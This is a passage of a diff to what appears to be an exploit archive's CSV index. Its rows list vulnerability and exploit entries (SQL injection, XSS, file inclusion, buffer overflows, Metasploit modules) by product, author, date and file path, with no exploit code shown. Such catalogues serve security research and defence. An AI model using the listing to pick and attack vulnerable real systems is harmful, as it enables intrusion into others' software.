2.21 (PHPJK) Search/DisplayResults.php iSearchID Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 +30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 (PHPJK) UserArea/Authenticate.php sUName Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 +30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 (PHPJK) UserArea/NewAccounts/index.php sAccountUnq Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 +30116,platforms/php/webapps/30116.txt,"PHP JackKnife 2.21 (PHPJK) G_Display.php Multiple Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 +30117,platforms/php/remote/30117.php,"PHP <= 5.1.6 Chunk_Split() Function Integer Overflow Vulnerability",2007-05-31,"Gerhard Wagner",php,remote,0 +30118,platforms/php/webapps/30118.txt,"Prototype of an PHP application 0.1 gestion/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30119,platforms/php/webapps/30119.txt,"Prototype of an PHP application 0.1 ident/identification.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30120,platforms/php/webapps/30120.txt,"Prototype of an PHP application 0.1 ident/disconnect.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30121,platforms/php/webapps/30121.txt,"Prototype of an PHP application 0.1 ident/loginliste.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30122,platforms/php/webapps/30122.txt,"Prototype of an PHP application 0.1 ident/loginmodif.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30123,platforms/php/webapps/30123.txt,"Prototype of an PHP application 0.1 ident/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30124,platforms/php/webapps/30124.txt,"Prototype of an PHP application 0.1 ident/ident.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30125,platforms/php/webapps/30125.txt,"Prototype of an PHP application 0.1 menu/menuprincipal.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30126,platforms/php/webapps/30126.txt,"Prototype of an PHP application 0.1 param/param.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30127,platforms/php/webapps/30127.txt,"Prototype of an PHP application 0.1 plugins/phpgacl/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30128,platforms/php/webapps/30128.txt,"Prototype of an PHP application 0.1 index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30129,platforms/php/webapps/30129.txt,"Prototype of an PHP application 0.1 common.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30130,platforms/php/remote/30130.txt,"PHP <= 5.2.3 EXT/Session HTTP Response Header Injection Vulnerability",2007-06-04,"Stefan Esser",php,remote,0 +30131,platforms/php/webapps/30131.txt,"Buttercup WFM Title Parameter Cross-Site Scripting Vulnerability",2007-06-01,"John Martinelli",php,webapps,0 +30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) Cross-Site script Vulnerability",2007-06-01,"Glafkos Charalambous ",php,webapps,0 +30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 chat.php sid Parameter XSS",2007-06-01,ReZEN,php,webapps,0 +30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 help.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 +30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 admin/header.php admin[name] Parameter XSS",2007-06-01,ReZEN,php,webapps,0 +30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 super/info.php BASE_URL Variable Parameter XSS",2007-06-01,ReZEN,php,webapps,0 +30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 setup/footer.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 +30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 Index.PHP Cross-Site Scripting Vulnerability",2007-06-02,vagrant,php,webapps,0 +30139,platforms/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 Outpost_IPC_HDR Local Denial of Service Vulnerability",2007-06-04,"Matousec Transparent security",multiple,dos,0 +30140,platforms/php/webapps/30140.txt,"Okyanusmedya Index.PHP Cross-Site Scripting Vulnerability",2007-06-04,vagrant,php,webapps,0 +30141,platforms/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 Haberoku.ASP SQL Injection Vulnerability",2007-06-04,ertuqrul,asp,webapps,0 +30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow Vulnerability",2007-06-04,"KaiJern Lau",linux,remote,0 +30143,platforms/php/webapps/30143.txt,"WebStudio CMS Index.PHP Cross-Site Scripting Vulnerability",2007-06-04,"Glafkos Charalambous ",php,webapps,0 +30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 eSellerateControl365.DLL ActiveX Control Buffer Overflow Vulnerability",2007-06-04,shinnai,windows,remote,0 +30145,platforms/ios/webapps/30145.txt,"Feetan Inc WireShare 1.9.1 iOS - Persistent Vulnerability",2013-12-08,Vulnerability-Lab,ios,webapps,0 +30146,platforms/ios/webapps/30146.txt,"Print n Share 5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps,0 +30152,platforms/php/webapps/30152.txt,"My Databook diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0 +30153,platforms/php/webapps/30153.txt,"My Databook diary.php year Parameter XSS",2007-06-04,Serapis.net,php,webapps,0 +30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0 +30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery Download_Script.ASP Arbitrary File Download Vulnerability",2007-06-06,freeprotect.net,asp,webapps,0 +30160,platforms/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability",2007-06-06,"Dennis Rand",windows,dos,0 +30161,platforms/php/webapps/30161.txt,"Atom PhotoBlog 1.0.1/1.0.9AtomPhotoBlog.PHP Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 +30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0 +30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0 +30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0 +30165,platforms/asp/webapps/30165.txt,Ibrahim,2007-06-08,ertuqrul,asp,webapps,0 +30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0 +30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0 +30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0 +30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 User ID Key Spoofing Vulnerability",2007-06-11,nnposter,windows,remote,0 +30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 - auth.php Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 +30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 - auth.php user Parameter XSS",2007-06-11,"Tim Brown",php,webapps,0 +30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 +30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 +30175,platforms/php/webapps/30175.txt,"BBpress 0.8.1 BB-Login.PHP Cross-Site Scripting Vulnerability",2007-06-11,"Ory Segal",php,webapps,0 +30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows Protocol Handler Command Injection Vulnerability",2007-06-12,"Thor Larholm",windows,remote,0 +30177,platforms/php/webapps/30177.txt,"PlaySms <= 0.9.9.2 - CSRF",2013-12-10,"Saadi Siddiqui",php,webapps,0 +30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 Cart comersus_message.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 +30206,platforms/cfm/webapps/30206.txt,"FuseTalk <= 4.0 forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",cfm,webapps,0 +30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use After Free",2013-12-17,metasploit,windows,remote,0 +30202,platforms/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 - AuthError.CFM SQL Injection Vulnerability",2007-06-19,"Ivan Almuina",cfm,webapps,0 +30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0 +29794,platforms/hardware/webapps/29794.txt,"Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability",2013-11-24,"Sebastián Magof",hardware,webapps,0 +29795,platforms/hardware/webapps/29795.pl,"Pirelli Discus DRG A125g - Local Password Disclosure Vulnerability",2013-11-24,"Sebastián Magof",hardware,webapps,0 +29796,platforms/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password Vulnerability",2013-11-24,"Sebastián Magof",hardware,webapps,0 29797,platforms/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability",2013-11-24,"IeDb ir",php,webapps,0 -29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - (.m3u) SEH Buffer Overflow (Unicode)",2013-11-24,"Mike Czumak",windows,local,0 29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2013-11-24,"Mike Czumak",windows,local,0 29800,platforms/windows/dos/29800.py,"Microsoft Internet Explorer 7.0 HTML Denial of Service Vulnerability",2007-03-28,shinnai,windows,dos,0 29801,platforms/php/local/29801.php,"PHP <= 5.2.1 Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass Vulnerability",2007-03-28,"Stefan Esser",php,local,0 @@ -26740,8 +26914,6 @@ id,file,description,date,author,platform,type,port 29808,platforms/php/remote/29808.php,"PHP <= 5.1.6 Msg_Receive() Memory Allocation Integer Overflow Vulnerability",2007-03-31,"Stefan Esser",php,remote,0 29809,platforms/linux/dos/29809.txt,"PulseAudio 0.9.5 Assert() Remote Denial of Service Vulnerability",2007-04-02,"Luigi Auriemma",linux,dos,0 29810,platforms/windows/dos/29810.c,"Symantec Multiple Products SPBBCDrv Driver Local Denial of Service Vulnerability",2007-04-01,"David Matousek",windows,dos,0 -29811,platforms/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 IssueNavigator.JSPA Cross-Site Scripting Vulnerability",2007-04-02,syniack,jsp,webapps,0 -29812,platforms/windows/remote/29812.rb,"DesktopCentral AgentLogUpload Arbitrary File Upload",2013-11-25,metasploit,windows,remote,8020 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista ARP Table Entries Denial of Service Vulnerability",2004-04-02,"Kristian Hermansen",windows,dos,0 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 LPEXT.DLL Cross-Site Scripting Vulnerability",2007-04-03,"Igor Monteiro Vieira",windows,remote,0 29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS Perl Code Evaluation",2013-11-25,metasploit,hardware,remote,443 @@ -26764,6 +26936,8 @@ id,file,description,date,author,platform,type,port 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins Remote File Upload Vulnerability",2013-11-26,link_satisi,php,webapps,0 +29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities",2007-05-07,shinnai,windows,remote,0 +29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0 @@ -26850,7 +27024,7 @@ id,file,description,date,author,platform,type,port 29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - (.wps) Buffer Overflow Exploit (SEH)",2013-11-30,"Julien Ahrens",windows,local,0 29924,platforms/hardware/webapps/29924.txt,"TP-Link TD-8840t - CSRF Vulnerability",2013-11-30,"mohammed al-saggaf",hardware,webapps,0 29926,platforms/windows/dos/29926.pl,"Audacious Player 3.4.2/3.4.1 - (.mp3) Crash PoC",2013-11-30,"Akin Tosunlar",windows,dos,0 -29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta, Inc. DPR2320R2 - Multiple CSRF Vulnerability",2013-11-30,sajith,hardware,webapps,0 +29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta_ Inc. DPR2320R2 - Multiple CSRF Vulnerability",2013-11-30,sajith,hardware,webapps,0 29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 BRY.ASP SQL Injection Vulnerability",2007-04-26,RMx,asp,webapps,0 29930,platforms/multiple/remote/29930.txt,"Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability",2007-04-27,jericho+bblog@attrition.org,multiple,remote,0 29931,platforms/multiple/remote/29931.txt,"ManageEngine Password Manager Pro Build 5401 Database Remote Unauthorized Access Vulnerability",2007-04-27,anonymous,multiple,remote,0 @@ -26858,7 +27032,6 @@ id,file,description,date,author,platform,type,port 29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal Down_Indir.ASP SQL Injection Vulnerability",2007-04-30,ertuqrul,asp,webapps,0 29934,platforms/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 - (.zip) Crash PoC",2013-11-30,KAI,windows,dos,0 29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0 -29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0 29938,platforms/php/webapps/29938.txt,"E-Annu Home.PHP SQL Injection Vulnerability",2007-04-30,ilkerkandemir,php,webapps,0 29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 XRender Extension Divide by Zero Denial of Service Vulnerability",2007-05-01,"Derek Abdine",linux,dos,0 29940,platforms/windows/dos/29940.html,"Mozilla Firefox 2.0.0.3 Href Denial of Service Vulnerability",2007-05-01,"Carl Hardwick",windows,dos,0 @@ -26868,10 +27041,13 @@ id,file,description,date,author,platform,type,port 29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 Logout.PHP Remote File Include Vulnerability",2007-05-03,"ilker Kandemir",php,webapps,0 29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T Var:RelaodHref Cross-Site Scripting Vulnerability",2007-05-03,"Tim Brown",hardware,remote,0 29946,platforms/php/webapps/29946.txt,"Wordpress Orange Themes CSRF File Upload Vulnerability",2013-12-01,"Jje Incovers",php,webapps,0 -29949,platforms/windows/dos/29949.c,"Multiple Vendors Zoo Compression Algorithm Remote Denial of Service Vulnerability",2007-05-04,Jean-Sébastien,windows,dos,0 +30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 Content.PHP SQL Injection Vulnerability",2007-06-18,"Jesper Jurcenoks",php,webapps,0 +30198,platforms/asp/webapps/30198.txt,"TDizin Arama.ASP Cross-Site Scripting Vulnerability",2007-06-18,GeFORC3,asp,webapps,0 +30199,platforms/cgi/webapps/30199.txt,"WebIf OutConfig Parameter Local File Include Vulnerability",2007-06-18,maiosyet,cgi,webapps,0 +30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module <= 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 +29949,platforms/windows/dos/29949.c,"Multiple Vendors Zoo Compression Algorithm Remote Denial of Service Vulnerability",2007-05-04,Jean-Sébastien,windows,dos,0 29950,platforms/osx/local/29950.js,"Apple <= 2.0.4 Safari Unspecified Local Vulnerability",2007-05-04,poplix,osx,local,0 29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting Vulnerability",2007-05-04,Solarius,windows,remote,0 -29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities",2007-05-07,shinnai,windows,remote,0 29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.PHP Remote File Include Vulnerability",2007-05-07,kezzap66345,php,webapps,0 29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 /011.1 Path Arbitrary Code Execution Vulnerability",2007-05-07,"Arnaud Giersch",linux,local,0 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module Index.PHP SQL Injection Vulnerability",2007-05-07,Bulan,php,webapps,0 @@ -26898,6 +27074,7 @@ id,file,description,date,author,platform,type,port 29976,platforms/php/webapps/29976.txt,"Campsite 2.6.1 ArticleTypeField.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29977,platforms/php/webapps/29977.txt,"Campsite 2.6.1 Country.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29978,platforms/php/webapps/29978.txt,"Campsite 2.6.1 DatabaseObject.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30373,platforms/windows/remote/30373.py,"Ability Mail Server 2013 (3.1.1) - Stored XSS (Web UI)",2013-12-17,"David Um",windows,remote,0 29979,platforms/php/webapps/29979.txt,"Campsite 2.6.1 Event.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29980,platforms/php/webapps/29980.txt,"Campsite 2.6.1 IPAccess.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29981,platforms/php/webapps/29981.txt,"Campsite 2.6.1 Image.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 @@ -26911,10 +27088,6 @@ id,file,description,date,author,platform,type,port 29989,platforms/php/webapps/29989.txt,"Campsite 2.6.1 ShortURL.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29990,platforms/php/webapps/29990.txt,"Campsite 2.6.1 Subscription.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29991,platforms/php/webapps/29991.txt,"Campsite 2.6.1 SubscriptionDefaultTime.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29996,platforms/php/webapps/29996.txt,"Campsite 2.6.1 Topic.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29997,platforms/php/webapps/29997.txt,"Campsite 2.6.1 UrlType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29998,platforms/php/webapps/29998.txt,"Campsite 2.6.1 User.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 @@ -26930,47 +27103,8 @@ id,file,description,date,author,platform,type,port 30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe - Remote Code Execution",2013-12-03,metasploit,windows,remote,12221 30010,platforms/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection",2013-12-03,metasploit,php,remote,80 30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0 -30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 -30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Include Vulnerability",2007-05-08,netVigilance,php,webapps,0 -30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp Frameset-7.HTML Cross-Site Scripting Vulnerability",2007-05-08,"Michael Domberg",windows,remote,0 -30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 DOP Command Local Privilege Escalation Vulnerability",2007-05-08,"Daniele Calore",unix,local,0 -30018,platforms/linux/remote/30018.py,"Python 2.5 PyLocale_strxfrm Function Remote Information Leak Vulnerability",2007-05-08,"Piotr Engelking",linux,remote,0 -30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 -30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service Vulnerability",2013-12-04,"Neil Kettle",linux,dos,0 -30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure Vulnerability",2007-05-10,anonymous,solaris,local,0 -30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.PHP Cross-Site Scripting Vulnerability",2007-05-10,the_Edit0r,php,webapps,0 -30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b - Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0 -30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow Vulnerability",2007-05-11,"Victor Stinner",linux,dos,0 -30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 -30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal Vulnerability",2007-05-11,"Digital Defense",windows,remote,0 -30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 Web Mail HTML Injection Vulnerability",2007-05-12,"Alla Bezroutchko",php,webapps,0 -30028,platforms/php/webapps/30028.txt,"EQDKP <= 1.3.1 Show Variable Cross-Site Scripting Vulnerability",2007-05-12,kefka,php,webapps,0 -30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - Search.PHP Cross-Site Scripting Vulnerability",2007-05-14,"Jesper Jurcenoks",php,webapps,0 -30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0 -30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow/SEH Buffer Overflow/DEP Bypass with ROP",2013-12-04,metacom,windows,local,0 -30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injection Vulnerabilities",2007-05-14,"Jesper Jurcenoks",php,webapps,0 -30036,platforms/php/webapps/30036.html,"WordPress 2.1.3 Akismet Plugin Unspecified Vulnerability",2007-05-14,"David Kierznowski",php,webapps,0 -30037,platforms/windows/remote/30037.txt,"Caucho Resin 3.1 Encoded Space (%20) Request Path Disclosure",2007-05-15,"Derek Abdine",windows,remote,0 -30038,platforms/windows/remote/30038.txt,"Caucho Resin 3.1 \web-inf Traversal Arbitrary File Access",2007-05-15,"Derek Abdine",windows,remote,0 -30039,platforms/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass Vulnerability",2007-05-15,"Matousec Transparent security",multiple,local,0 -30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email FormMail.PHP Input Validation Vulnerability",2007-05-15,"Jesper Jurcenoks",php,webapps,0 -30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - view/search/ path Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 -30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 -30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote,0 -30045,platforms/windows/remote/30045.html,"PrecisionID Barcode PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite Vulnerability",2007-05-16,shinnai,windows,remote,0 -30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup <= 11.5 mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 -30047,platforms/php/webapps/30047.txt,"VBulletin <= 3.6.6 Calendar.PHP HTML Injection Vulnerability",2007-05-16,"laurent gaffie",php,webapps,0 -30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 ShopContent.ASP Cross-Site Scripting Vulnerability",2007-05-17,"John Martinelli",asp,webapps,0 -30049,platforms/windows/remote/30049.html,"LEADTOOLS Multimedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow Vulnerability",2007-05-17,shinnai,windows,remote,0 -30050,platforms/php/webapps/30050.html,"Redoable 1.2 Theme header.php s Parameter XSS",2007-05-17,"John Martinelli",php,webapps,0 -30051,platforms/php/webapps/30051.txt,"PsychoStats <= 2.3 - Server.PHP Path Disclosure Vulnerability",2007-05-17,kefka,php,webapps,0 -30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 -30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 -30054,platforms/jsp/webapps/30054.txt,"Sonicwall Gms 7.x - Filter Bypass & Persistent Vulnerability (0Day)",2013-12-05,Vulnerability-Lab,jsp,webapps,0 -30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0 -30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module <= 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 +30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 (profile.php password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0 30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote and Local File Disclosure Vulnerability",2013-12-06,"aceeeeeeeer .",php,webapps,0 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 HLStats.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 @@ -26994,119 +27128,29 @@ id,file,description,date,author,platform,type,port 30082,platforms/php/webapps/30082.txt,"GNUTurk Mods.PHP Cross-Site Scripting Vulnerability",2007-05-25,vagrant,php,webapps,0 30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 (mod_notification) Stored Cross-Site Scripting Vulnerability",2013-12-06,LiquidWorm,php,webapps,0 30084,platforms/php/webapps/30084.php,"Wordpress page-flip-image-gallery plugins Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 -30085,platforms/linux/webapps/30085.txt,"Zimbra - Privilegie Escalation via LFI (0day)",2013-12-06,rubina119,linux,webapps,0 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 Index.PHP Cross-Site Scripting 